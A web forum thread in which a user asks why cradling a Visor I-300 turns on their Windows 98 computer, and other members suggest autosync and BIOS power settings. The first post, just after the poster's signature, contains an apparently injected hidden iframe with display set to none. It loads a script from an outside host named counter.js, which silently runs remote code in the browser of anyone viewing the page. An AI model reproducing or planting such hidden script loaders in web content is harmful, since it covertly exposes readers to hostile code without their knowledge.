+ Reply to Thread
Results 1 to 5 of 5
  1. #1
    Registered User
    Join Date
    11-26-2001
    Location
    Connecticut
    Posts
    9

    Angry Computer turns on on cradling

    When I insert my I-300 in my home computer, an HP running Win98 (SE2), the computer will turn on and start booting up. If the computer is already on inserting the I-300 has no effect and everything works fine. I don't have this problem with my office computer, a Dell also running Win98 (SE2). I'm running the Palm desktop software 3.0.1 from my old Handspring, both at home and work. The HotSync software is 3.0.2H.

    This effect is particularly irritating, because it happens when I want to go to bed and the last thing I do is recharge the I-300 for use the next day. Any thoughts on how to fix this?

    Markatty<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Old School mjorange's Avatar
    Join Date
    11-07-2001
    Location
    San Rafael
    Posts
    2,254
    Sounds like you've got your 300 configured to autosync once placed in the cradle. I don't recall where that feature is but that would be all I could think of. Try HotSync Manager.

  3. #3
    Registered User
    Join Date
    11-08-2001
    Posts
    43
    Maybe there is a setting in the bios to wake on event? Check that if the previous post doesnt pan out.

  4. #4
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    check your power options in your BIOS... ACPI

  5. #5
    Registered User
    Join Date
    11-26-2001
    Location
    Connecticut
    Posts
    9
    I couldn't find the info on auto-sync in either Hot-Sync help or the Palm manual that came with my Visor.

    I looked at the Power Settings in the BIOS and didn't see anything that would cause and Auto-on. I disabled power management and there was no change. I had a power setting that was either On/Off or Sleep/Wake and left this at On/Off.

    One additional sympthom, when the I-300 is cradled and I shut down the computer, it acts as if I selected Restart rather than Shut Down. The computer shuts down, pauses for a few seconds and then restarts.

    Markatty

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts